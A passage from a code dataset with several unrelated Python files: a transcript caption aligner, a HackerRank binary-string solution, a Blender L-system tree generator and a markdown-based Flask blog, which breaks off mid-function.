are attributed to those two indices\n start_processed_word = self.timetable[start_processed_word_index]\n end_processed_word = self.timetable[end_processed_word_index]\n\n # Find all the words that are in between those two words\n words = self.transcript[start_processed_word[\"startOffset\"]:end_processed_word[\"endOffset\"] + 1].strip()\n\n # Clean up the words\n words = re.sub(r\"\\s+\", \" \", words.replace(\"\\n\", \" \")) # Replace newlines with a single space\n\n # Add more info to the words\n dict_with_more_info = {\n \"start_time\": block_num * block_duration,\n \"end_time\": (block_num + 1) * block_duration,\n \"text\": words\n }\n\n # Append that dictionary to the `aligned_words` list\n aligned_words.append(dict_with_more_info)\n\n # Return the `aligned_words` list\n return aligned_words\n\n def align_sentence(self, max_block_length=15):\n \"\"\"\n Method that aligns the transcript by sentence.\n\n Args:\n max_block_length (int):\n The maximum number of timetabled words that can be in each caption block.\n This value must be a positive integer.\n (Default = 15)\n\n Returns:\n list[dict]:\n The aligned text dictionary.\n\n Notes:\n - A sentence is defined to be a string of text that ends with a punctuation mark (\".\", \"?\" and \"!\" only).\n \"\"\"\n\n # Define sentence ending characters\n sentence_ending_characters = [\".\", \"!\", \"?\"]\n\n # Iterate through every timetable word\n aligned_words = [] # Stores the sentences with the start and end times\n block_start_time = None # The starting time of the current caption block\n block_end_time = None # The ending time of the current caption block\n block_start_index = None # The starting index of the current caption block\n block_length = 0 # Stores the length of the current caption block\n start_of_sentence = True # Whether the current word is the start of a new sentence\n\n for timetable_word in self.timetable:\n # Update the block's starting time & starting index, if needed\n if block_start_time is None:\n # Set the block's starting index\n block_start_index = timetable_word[\"startOffset\"]\n\n # Check if the current word has a \"start\" key\n if \"start\" in timetable_word:\n block_start_time = timetable_word[\"start\"]\n else:\n # Use the end time of the previous block instead\n block_start_time = block_end_time\n\n # Update the `start_of_sentence` variable\n start_of_sentence = True\n\n # Find the starting and ending character's position\n start_pos = timetable_word[\"startOffset\"]\n end_pos = timetable_word[\"endOffset\"] # This is the position of the character that is one after the word\n\n # Check if the sentence ends on the current word\n # We do this by checking if the current character is one of the `sentence_ending_characters` and the\n # character after that is not a space.\n if self.transcript[end_pos] in sentence_ending_characters and self.transcript[end_pos + 1].isspace():\n # Set the time which the current caption block ends\n if \"end\" in timetable_word:\n block_end_time = timetable_word[\"end\"]\n else:\n # Extrapolate the time based off the speed of reading\n second_per_char = block_start_time / block_start_index # Speed of reading each character\n block_end_time = second_per_char * end_pos\n\n # Create the dictionary that will go into the `aligned_words` array\n text = self.transcript[block_start_index:end_pos + 1] # Get text from transcript\n text = re.sub(r\"\\s+\", \" \", text.strip().replace(\"\\n\", \" \")) # Process the text for display\n\n aligned_words.append({\n \"start_time\": block_start_time,\n \"end_time\": block_end_time,\n \"text\": text\n })\n\n # Update the block's starting time, starting index and block length\n block_start_time = None # Wait for the new word to override this\n block_start_index = None # Wait for the new word to override this\n block_length = 0\n\n # Check if this is the start of a new sentence\n elif start_of_sentence:\n # Ignore and move on\n pass\n\n # Check if the sentence ended on the previous word\n else:\n # Get the non-whitespace character that is to the left of the word\n non_whitespace_char_pos = start_pos - 2 # Ignore the previous character as it is likely to be a space\n\n while self.transcript[non_whitespace_char_pos].isspace():\n non_whitespace_char_pos -= 1\n\n # Check if that character is one of the sentence ending characters\n if self.transcript[non_whitespace_char_pos] in sentence_ending_characters:\n # Set the time which the current caption block ends\n if \"start\" in timetable_word:\n block_end_time = timetable_word[\"start\"] # We don't have the previous word's end time\n else:\n # Extrapolate the time based off the speed of reading\n second_per_char = block_start_time / block_start_index # Speed of reading each character\n block_end_time = second_per_char * non_whitespace_char_pos\n\n # Create the dictionary that will go into the `aligned_words` array\n text = self.transcript[block_start_index:non_whitespace_char_pos + 1]\n text = re.sub(r\"\\s+\", \" \", text.strip().replace(\"\\n\", \" \")) # Process the text for display\n\n aligned_words.append({\n \"start_time\": block_start_time,\n \"end_time\": block_end_time,\n \"text\": text\n })\n\n # Update the block's starting time, starting index and block length\n block_start_time = block_end_time # The sentence already started\n block_start_index = timetable_word[\"startOffset\"]\n block_length = 1 # We already have one word\n\n # Check if the `block_length` has exceeded or equals the `max_block_length`\n elif block_length >= max_block_length:\n # Set the time which the current caption block ends\n if \"start\" in timetable_word:\n block_end_time = timetable_word[\"end\"]\n else:\n # Extrapolate the time based off the speed of reading\n second_per_char = block_start_time / block_start_index # Speed of reading each character\n block_end_time = second_per_char * end_pos\n\n # Create the dictionary that will go into the `aligned_words` array\n text = self.transcript[block_start_index:end_pos + 1]\n text = re.sub(r\"\\s+\", \" \", text.strip().replace(\"\\n\", \" \")) # Process the text for display\n\n aligned_words.append({\n \"start_time\": block_start_time,\n \"end_time\": block_end_time,\n \"text\": text\n })\n\n # Update the block's starting time\n block_start_time = block_end_time # Continue the sentence in the next block\n block_start_index = end_pos + 1 # Exclude the space before the word\n block_length = 0 # Reset the length of each block back to 0\n\n # Update the value of `start_of_sentence` and `block_length`\n start_of_sentence = False\n block_length += 1 # Added one more timetabled word\n\n # Return the `aligned_words` array\n return aligned_words\n\n\n# TESTING CODE\nif __name__ == \"__main__\":\n # Imports\n import ast\n\n # Read the timetable and transcript\n aTranscript = open(\"../../TranscriptClean.txt\", \"r\").read()\n aTimetable = ast.literal_eval(open(\"TestResponse.txt\", \"r\").read())\n\n # Create an `Aligner` object\n aligner = Aligner(aTranscript, aTimetable)\n\n # Align the words\n alignedWords = aligner.align_sentence()\n print(alignedWords)\n","repo_name":"PhotonicGluon/Video-To-Captions","sub_path":"src/timetable_fixing/transcript_aligner.py","file_name":"transcript_aligner.py","file_ext":"py","file_size_in_byte":11883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"30918546915","text":"#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n\r\n#\r\n# Complete the 'maximumPower' function below.\r\n#\r\n# The function is expected to return an INTEGER.\r\n# The function accepts STRING s as parameter.\r\n#\r\n\r\ndef maximumPower(s):\r\n i = 0\r\n max_val = 0\r\n while i < len(s):\r\n rotated_str = s[-1] + s[:-1]\r\n print(rotated_str)\r\n s = rotated_str\r\n if max_val < int(s, 2) and int(s, 2) % 2 == 0:\r\n max_val = int(s, 2)\r\n i = i + 1\r\n return int(math.sqrt(max_val & (~(max_val - 1))))\r\n\r\n\r\nif __name__ == '__main__':\r\n s = input()\r\n result = maximumPower(s)\r\n print(result)\r\n","repo_name":"devs-93/Problem-Solving-Python","sub_path":"HackerRank HackFest 2020 /Strictly Increasing Sequence.py","file_name":"Strictly Increasing Sequence.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"11045467215","text":"#math imports\nfrom random import random\nfrom math import radians, degrees, atan2, sqrt, copysign, acos, cos\n\n#python import\nimport copy\n\n#blender imports\nimport mathutils\nfrom mathutils import Quaternion, Vector\nimport bpy\n\nclass Turtle(object):\n #perform the turtle movements\n \n #attributes of Turtele class\n dir = Vector([0.0, 0.0, 1.0])\n pos = Vector([0.0, 0.0, 0.0])\n right = Vector([-1.0, 0.0, 0.0])\n width = 0.0\n \n def __init__(self, dir, pos, right, width):\n self.dir = dir\n self.pos = pos\n self.right = right\n self.width = width\n \n self.dir.normalize()\n self.right.normalize()\n \n def yaw(self, ang):\n #positive angle moves to the right\n axis = self.dir.cross(self.right)\n axis.normalize()\n \n rot = Quaternion(axis, radians(ang))\n \n self.dir.rotate(rot)\n self.dir.normalize()\n self.right.rotate(rot)\n self.right.normalize()\n \n def pitch(self, ang):\n #positive angle rises turtle's nose\n self.dir.rotate(Quaternion(self.right, radians(ang)))\n self.dir.normalize()\n \n def roll(self, ang):\n #positive angle turn right\n self.right.rotate(Quaternion(self.dir, radians(ang)))\n self.right.normalize()\n \n def move(self, step):\n #move the turtle forward\n self.pos += self.dir * step\n\n def setWidth(self, width):\n self.width = width\n \n def resetVertical(self):\n self.dir = Vector([0.0, 0.0, 1.0])\n slef.right = Vector([-1.0, 0.0, 0.0])\n \nclass Branch(object):\n #attributes\n polyline = None\n start = Vector([0,0,0])\n turtle = None\n curve = None\n #handle lenght\n tang_l = 0.00\n \n def __init__(self, curve, turtle, tropism, trop_const):\n #set tropism\n axis = turtle.dir.cross(tropism)\n rot = Quaternion(axis, trop_const*axis.length)\n turtle.dir.rotate(rot)\n turtle.dir.normalize()\n \n self.polyline = curve.splines.new('BEZIER')\n self.curve = curve\n self.turtle = copy.deepcopy(turtle)\n self.start = self.turtle.pos\n self.polyline.bezier_points[0].co = self.start\n \n self.polyline.bezier_points[0].radius = self.turtle.width\n \n self.polyline.bezier_points[0].handle_left = self.turtle.pos\n self.polyline.bezier_points[0].handle_right = self.turtle.pos\n \n self.tang_l = 1\n \nclass Tree(object):\n #stack to put the branches\n stack = []\n curve = None\n obj = None\n #main Branch object\n stem = None\n #tropism vector and constant\n tropism = Vector([0,0,0])\n trop_const = 0.001\n \n def __init__(self, turtle, tropism, mean_step):\n self.tropism = tropism\n self.trop_const = mean_step/1000\n \n #create and bevel the curve\n self.curve = bpy.data.curves.new(name = \"Tree\",type='CURVE')\n self.curve.dimensions = '3D'\n self.curve.resolution_u = 4\n self.curve.fill_mode = 'FULL'\n self.curve.bevel_depth = 0.045 \n \n #link the object to the scene\n self.obj = bpy.data.objects.new(\"Tree\"+\"Obj\", self.curve)\n bpy.context.scene.collection.objects.link(self.obj)\n \n #create first branch and push into the stack\n self.stack.append(Branch(self.curve, turtle, self.tropism, self.trop_const))\n \n #set the handles to the turtles point\n self.stack[0].polyline.bezier_points[0].handle_left = self.stack[0].turtle.pos\n self.stack[0].polyline.bezier_points[0].handle_right = self.stack[0].turtle.pos\n \n self.stem = self.stack[0]\n \n def move(self, step):\n #update tangent lenght\n self.stem.tang_l = step/10\n #move turtle\n self.stem.turtle.move(step)\n \n #add new point\n self.stem.polyline.bezier_points.add(1)\n self.stem.polyline.bezier_points[-1].co = self.stem.turtle.pos\n \n #handles direction tangent to the curve\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n self.stem.polyline.bezier_points[-1].handle_right = self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #set the curve radius to be the turtle's width\n self.stem.polyline.bezier_points[-1].radius = self.stem.turtle.width\n \n def pitch(self, ang):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #pitch the turtle\n self.stem.turtle.pitch(ang)\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def roll(self, ang):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #roll the turtle\n self.stem.turtle.roll(ang)\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def yaw(self, ang):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #yaw the turtle\n self.stem.turtle.yaw(ang)\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def fork(self):\n #create new branch and push into the stack\n self.stack.append(Branch(self.curve, self.stem.turtle, self.tropism, self.trop_const))\n #subscribe stem attribute with a new branch starting from the last vertex\n self.stem = self.stack[-1]\n \n def closeBranch(self):\n #pop out of the stack (set radius to 0 if no one is parent of this branch)\n self.stack.pop()\n #set the radius to 0\n self.stem.turtle.width = 0\n self.stem.polyline.bezier_points[-1].radius = self.stem.turtle.width\n \n #subscribe stem attribute with the previous branch\n if(len(self.stack) != 0): self.stem = self.stack[-1]\n \n def closeZBranch(self):\n #pop out of the stack\n self.stack.pop()\n #subscribe stem attribute with the previous branch\n if(len(self.stack) != 0): self.stem = self.stack[-1]\n \n def setW(self, width):\n #set the curve radius at turtle location\n self.stem.polyline.bezier_points[-1].radius = width\n self.stem.turtle.setWidth(width)\n \n def resetOrientation(self):\n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_right= self.stem.turtle.pos + self.stem.turtle.dir*self.stem.tang_l\n \n #reset orientation of turtle\n self.stem.turtle.resetVertical()\n \n #set handle to be tangent to the segment\n self.stem.polyline.bezier_points[-1].handle_left = self.stem.turtle.pos - self.stem.turtle.dir*self.stem.tang_l\n \n def multiplyW(self, value):\n #multiply the turtle width by value\n self.stem.turtle.width *= value\n self.stem.polyline.bezier_points[-1].radius = self.stem.turtle.width\n \n \n\"\"\"\nTURTLE SYMBOLS\n\n!(w) Set turtle width to w.\n*(w) Multiply turtle width by w.\nF(l) or f(l) Move turtle forward by l .\n+(a) Turn turtle left by a.\n-(a) Turn turtle right by a.\n&(a) Pitch turtle down by a.\n^(a) Pitch turtle up by a.\n/(a) Roll turtle right by a.\nn(a) Roll turtle left by a.\n[ Start branch.\n] End branch seting radius to 0.\n$ Reset turtle to vertical\n% Set Branch radius to 0\n} End branch without seting radius to 0.\n\n\"\"\"\n\n\"\"\" EXAMPLES OF SEQUENCES \"\"\"\n\n\"\"\" SYMPODIAL TREE \"\"\"\ndef genSympodialSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"A\",[step, len_radius_const*step])])\n res = []\n base_w = len_radius_const*step\n \n #CONSTANTS\n #contraction ratio 1\n r1 = 0.9\n #contraction ratio 2\n r2 = 0.7\n #branching angle 1\n a1 = 10\n #branching angle 2\n a2 = 50\n #principal branching angle\n ap = 20\n #width decrease rate\n wr = 0.657\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n #REWRITE RULES:\n if(x[0] == \"A\"):\n w = x[1][1]\n l = x[1][0]\n \n res += [(\"!\", [w]), (\"F\", [l]), (\"[\", []), (\"&\", [a1]), (\"B\", [l*r1, w*wr]), (\"}\", []), (\"/\", [180]),\n (\"[\", []), (\"&\", [ap]), (\"B\", [l*r2, w*wr]), (\"}\", [])]\n \n elif(x[0] == \"B\"):\n w = x[1][1]\n l = x[1][0]\n \n res += [(\"!\", [w]), (\"F\", [l]), (\"[\", []), (\"+\", [a1]), (\"B\", [l*r1, w*wr]), (\"}\", []),\n (\"[\", []), (\"-\", [a2]), (\"B\", [l*r2, w*wr]), (\"}\", [])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" WILLOW \"\"\"\ndef genWillowSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"T\",[]), (\"A\",[])])\n res = []\n base_w = len_radius_const*step\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n #REWRITE RULES:\n if(x[0] == \"T\"):\n res += [(\"!\", [base_w]), (\"F\", [step*1.5]), (\"T\",[])]\n \n elif(x[0] == \"A\"):\n res += [(\"&\", [90]), (\"X\", []), (\"B\", []), (\"B\", []), (\"B\", []), (\"B\", []), (\"B\", []), (\"B\", [])]\n \n elif(x[0] == \"B\"):\n res += [(\"-\", [10]), (\"X\", []), (\"-\", [10]), (\"X\", []), (\"-\", [10]), (\"X\", [])]\n \n elif(x[0] == \"X\"):\n res += [(\"Z\", []), (\"-\", [10]), (\"Z\", []), (\"-\", [10]), (\"Z\", []), (\"-\", [10]), (\"Z\", [])]\n \n elif(x[0] == \"Z\"):\n res += [(\"!\", [base_w*0.2]), (\"%\", [])]\n \n elif(x[0] == \"%\"):\n i = random()\n if(i > 0.5): res += [(\"[\", []), (\"&\", [15]), (\"F\", [step]), (\"%\", []), (\"}\", [])]\n else: res += [(\"[\", []), (\"&\", [25]), (\"F\", [step]), (\"%\", []), (\"!\", [base_w*0.1]), (\"[\", []), (\"-\", [10]), (\"F\", [step]), (\"%\", []),\n (\"}\", []), (\"[\", []), (\"+\", [10]), (\"F\", [step]), (\"%\", []), (\"}\",[]) , (\"}\",[])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" SEAWEED \"\"\"\ndef genSeaweedSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"F\",[step])])\n res = []\n base_w = len_radius_const*step\n ang = 22\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n #REWRITE RULES:\n if(x[0] == \"F\"):\n res += [(\"F\", [step]), (\"F\", [step]), (\"+\", [ang]), (\"[\", []), (\"^\", [ang]), (\"F\", [step]), (\"&\", [ang]),\n (\"F\", [step]), (\"&\", [ang]), (\"F\", [step]), (\"]\", []), (\"-\", [ang]), (\"[\", []), (\"&\", [ang]),\n (\"F\", [step]), (\"^\", [ang]), (\"F\", [step]), (\"^\", [ang]), (\"F\", [step]), (\"]\", []), (\"n\", [step]),\n (\"[\", []), (\"&\", [ang]), (\"f\", [step]), (\"&\", [ang]), (\"f\", [step]), (\"^\", [ang]), (\"f\", [step])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"]\",[])]\n \n return lsys\n\n\"\"\" BUSH \"\"\"\ndef genBushSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"A\",[])])\n res = []\n base_w = len_radius_const*step\n ang = 22.5\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n \n #REWRITE RULES:\n if(x[0] == \"A\"):\n res += [(\"[\", []), (\"&\", [ang]), (\"F\", [step]), (\"*\", [0.8]), (\"A\", []),(\"F\", [step]), (\"]\", []), (\"/\", [ang]),\n (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"[\", []), (\"&\", [ang]), (\"F\", [step]),\n (\"*\", [0.8]), (\"A\", [ang]), (\"F\", [step]), (\"]\", []), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]),\n (\"[\", []), (\"&\", [ang]), (\"F\", [step]), (\"*\", [0.8]), (\"A\", []),(\"F\", [step]), (\"]\", [])]\n \n elif(x[0] == \"F\"):\n res += [(\"S\", []), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"/\", [ang]), (\"F\", [step])]\n \n elif(x[0] == \"S\"):\n res += [ (\"F\", [step]) , (\"L\", [])]\n \n elif(x[0] == \"L\"):\n res += [(\"[\", []), (\"^\", [ang]), (\"^\", [ang]), (\"[\", []), (\"-\", [ang]), (\"f\", [step]), (\"-\", [ang]), (\"f\", [step]),\n (\"]\", []),(\"]\", [])]\n print(1)\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" A NICE TREE \"\"\"\ndef genNiceTreeSeq(itr, step, len_radius_const):\n #generate sequence that will move the turtle\n #commands are in the form of a tuples list tuple(\"symbol\",[value1, value2,...])\n #list of commands in the form of [(\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[]), (\"\",[])] \n #ex: (\"^\",[45])\n \n ##CONSTANTS\n #divergence angle 1\n d1 = 94.74 \n #divergence angle 1 \n d2 = 132.63\n #branching angle\n a = 30.95\n #enlongating ratio\n lr = 1.229\n #widhth decrease ratio\n vr = 1.832\n \n lsys = []\n \n #AXIOM\n lsys.extend([(\"*\",[1]),(\"F\",[step]), (\"/\",[45]), (\"A\",[])])\n res = []\n base_w = len_radius_const*step\n \n #REWRITING\n #repat itr times, changing the values\n for num in range(itr):\n for x in lsys:\n \n #REWRITE RULES:\n if(x[0] == \"A\"):\n res += [(\"*\", [1/vr]), (\"F\", [step/2]), (\"[\", []), (\"&\", [a]), (\"F\", [step/2]), (\"A\", []), (\"}\", []),\n (\"/\", [d1]), (\"[\", []), (\"&\", [a]), (\"F\", [step/2]), (\"A\", []), (\"}\", []),\n (\"/\", [d2]), (\"[\", []), (\"&\", [a]), (\"F\", [step/2]), (\"A\", []), (\"}\", [])]\n \n elif(x[0] == \"F\"):\n l = x[1][0]\n \n res += [(\"F\", [l*lr])]\n \n elif(x[0] == \"*\"):\n w = x[1][0]\n print(w)\n res += [(\"*\", [1/(vr)])]\n \n else:\n res += [(x[0],x[1])]\n ## \n lsys = copy.deepcopy(res)\n res = []\n #end of principal branch\n lsys += [(\"}\",[])]\n \n return lsys\n\n\"\"\" SEQUENCE INTERPRETER \"\"\"\ndef parser(tree, i, info):\n \n \"\"\" RATIOS ARE ALSO DEFINED IN THE FUNCTION \"\"\"\n if(i == 0):\n seq = genSympodialSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 1):\n seq = genWillowSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 2): \n seq = genSeaweedSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 3): \n seq = genBushSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n elif(i == 4): \n seq = genNiceTreeSeq(info[0], info[1], info[2])\n tree.stem.turtle.width = info[1]*info[2]\n\n #transform sequence in steps\n for x in seq:\n ##interpreter rules\n \n if(x[0] == \"!\"): tree.setW(x[1][0])\n \n elif(x[0] == \"F\"): tree.move(x[1][0]);\n \n elif(x[0] == \"f\"): tree.move(x[1][0])\n \n elif(x[0] == \"+\"): tree.yaw((-1)*x[1][0])\n \n elif(x[0] == \"-\"): tree.yaw(x[1][0])\n \n elif(x[0] == \"&\"): tree.pitch((-1)*x[1][0])\n \n elif(x[0] == \"^\"): tree.pitch(x[1][0])\n \n elif(x[0] == \"/\"): tree.roll(x[1][0])\n \n elif(x[0] == \"n\"): tree.roll((-1)*x[1][0])\n \n elif(x[0] == \"[\"): tree.fork()\n \n elif(x[0] == \"]\"): tree.closeBranch()\n \n elif(x[0] == \"$\"): tree.resetOrientation()\n \n elif(x[0] == \"*\"): tree.multiplyW(x[1][0])\n \n elif(x[0] == \"%\"): tree.setW(0)\n \n elif(x[0] == \"}\"): tree.closeZBranch()\n\ndef run():\n \n \"\"\" DEFINE TYPE OF TREE \"\"\"\n \"\"\"\n i = 0: SYMPODIAL TREE\n 1: WILLOW\n 2: SEAWEED\n 3: BUSH\n 4: NICE TREE\n \"\"\"\n i = 1\n \n \"\"\" DEFINE INITIAL ATTRIBUTES OF THE TURTLE \"\"\" \n direction = mathutils.Vector([0.0, 0.0, 1.0])\n position = mathutils.Vector([0.0, 0.0, 0.0])\n right = mathutils.Vector([-1.0, 0.0, 0.0])\n \n \"\"\" DEFINE TROPISM VECTOR \"\"\"\n \"\"\" EACH CORDINATE WITH ABSOLUTE VALUE FROM 0 TO 100 (SOME, LIKE THE WIDOW, ARE MORE SENSITIVE)\"\"\"\n tropism = mathutils.Vector([-6.5, 0.0, 00.0])\n \n \"\"\" DEFINE NUMBER OF ITERATIONS\"\"\"\n \"\"\"\n BEST ITERATIONS OF EACH TREE:\n SYMPODIAL: 9\n WILLOW: 8\n SEAWEED: 3\n BUSH: 4\n NICE TREE: 7 \n \"\"\"\n itr = 8\n \n \"\"\" DEFINE STEP \"\"\"\n \"\"\" 10 ~ 20 is a good value \"\"\"\n step = 10\n \n \"\"\" DEFINE THE BASE_WIDTH/STEP RATIO \"\"\"\n \"\"\" \n GOOD VALUES\n SYMPODIAL: 1\n WILLOW: 3\n SEAWEED: 0.5\n BUSH: 0.8\n NICE TREE: 20 \n \"\"\"\n ratio = 3\n \n tree = Tree(Turtle(direction, position, right, 0.0), tropism, step)\n parser(tree, i, [itr, step, ratio]) \n\n \n\n\nrun()\n\n\n","repo_name":"antoniospg/S3D-ASSIGNMENT","sub_path":"Blender-Assignment/L-TREES.py","file_name":"L-TREES.py","file_ext":"py","file_size_in_byte":19372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40817337960","text":"# ----------------------------------------------------------------------------#\n# Imports\n# ----------------------------------------------------------------------------#\n\nfrom flask import Flask, render_template, request\nimport json\nimport os\nimport sha3\nimport re\nimport markdown\nimport datetime\n\n# ----------------------------------------------------------------------------#\n# App Config.\n# ----------------------------------------------------------------------------#\n\napp = Flask(__name__)\n# set static and template folders\napp.template_folder = \"frontend/html\"\napp.static_folder = \"frontend/assets\"\n\n\n# ----------------------------------------------------------------------------#\n# Routes.\n# ----------------------------------------------------------------------------#\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/blog2\")\ndef blog2():\n return render_template(\"blog.html\")\n\n\n@app.route(\"/help\")\ndef help():\n return render_template(\"help.html\")\n\n\n@app.route(\"/learn\")\ndef learn():\n return render_template(\"learn.html\")\n\n\n@app.route(\"/donate\")\ndef donate():\n return render_template(\"donate.html\")\n\n\n@app.route(\"/post\")\ndef post():\n return render_template(\"post.html\")\n\n\n# ----------------------------------------------------------------------------#\n# Blog\n# ----------------------------------------------------------------------------#\n\n\n@app.route(\"/blog/\", methods=[\"GET\"])\ndef blog_post(post):\n base_path = app.template_folder + \"/blog/\" + post + \"/\"\n try:\n post_html, details = get_blog_post(base_path, post)\n except FileNotFoundError:\n return \"404: Don't mess around with the url pls :)\", 404\n\n # render the post\n return render_template(\n \"blog/blogpost.html\",\n post=post,\n post_html=post_html,\n details=details,\n )\n\n\n@app.route(\"/blog\", methods=[\"GET\"])\ndef blog():\n # get all blog posts and their preview content\n posts = get_all_blog_content()\n return render_template(\"/blog/blog.html\", posts=posts)\n\n\ndef get_all_blog_content():\n posts = []\n for post in os.listdir(app.template_folder + \"/blog/\"):\n # skip if not a directory\n if not os.path.isdir(app.template_folder + \"/blog/\" + post):\n continue\n\n # call blog_post() to generate content_preview.html file\n if not os.path.exists(\n app.template_folder + \"/blog/\" + post + \"/content_preview.html\"\n ) or not os.path.exists(app.template_folder + \"/blog/\" + post + \"/details.json\"):\n # generate content_preview.html file (and everything else)\n get_blog_post(app.template_folder + \"/blog/\" + post + \"/\", post)\n\n with open(app.template_folder + \"/blog/\" + post + \"/details.json\") as f:\n details = json.load(f)\n\n if details[\"isPublished\"] == \"true\":\n posts.append(\n {\n \"slug\": details[\"slug\"],\n \"author\": details[\"author\"],\n \"tags\": details[\"tags\"],\n \"date\": details[\"date\"],\n \"content_preview\": open(\n app.template_folder + \"/blog/\" + post + \"/content_preview.html\"\n ).read(),\n \"post\": post,\n }\n )\n\n # sort posts by date\n posts = sorted(posts, key=lambda k: k[\"date\"], reverse=True)\n return posts\n\ndef get_blog_post(post_path, post):\n # load details.json file if it exists, else use default values & save to file\n if os.path.exists(post_path + \"details.json\"):\n with open(post_path + \"details.json\") as f:\n details = json.load(f)\n print(f\"DETAILS: {details}\")\n else:\n today = datetime.datetime.now()\n details = {\n \"slug\": post,\n \"author\": \"Nadia Hayajneh\",\n \"tags\": \"\",\n \"isPublished\": \"true\",\n \"overwriteHtml\": \"true\",\n \"date\": today.strftime(\"%Y-%m-%d\"),\n \"contentHash\": \"\",\n }\n # save details.json file\n with open(post_path + \"details.json\", \"w\") as f:\n json.dump(details, f, indent=4)\n\n # CHECK IF THE CONTENT HAS CHANGED\n content_md = open(post_path + \"content.md\", \"r\").read()\n content_hash = sha3.keccak_256(content_md.encode(\"utf-8\")).hexdigest()\n rerender_flag = False\n # compare to existing hash in details.json\n if details[\"contentHash\"] != content_hash:\n details[\"contentHash\"] = content_hash\n with open(post_path + \"details.json\", \"w\") as f:\n json.dump(details, f, indent=4)\n rerender_flag = True and details[\"overwriteHtml\"]\n\n if not os.path.exists(post_path + \"content.html\") or rerender_flag:\n # takes in blog//content.md, turns it into html and renders it\n post_html = markdown.markdown(open(post_path + \"content.md\").read())\n\n # DO NOT TOUCHHHHH\n # replace all internal links so they point to the correct place\n pattern = re.compile(r'src=\"(?!(https://|http://))([^\"]*)\"')\n post_html = pattern.sub(r'src=\"../src/html/blog/' + post + r'/\\2\"', post_html)\n\n # save html to file\n with open(post_path + \"content.html\", \"w\") as f:\n f.write(post_html)\n else:\n post_html = open(post_path + \"content.html\").read()\n\n if not os.path.exists(post_path + 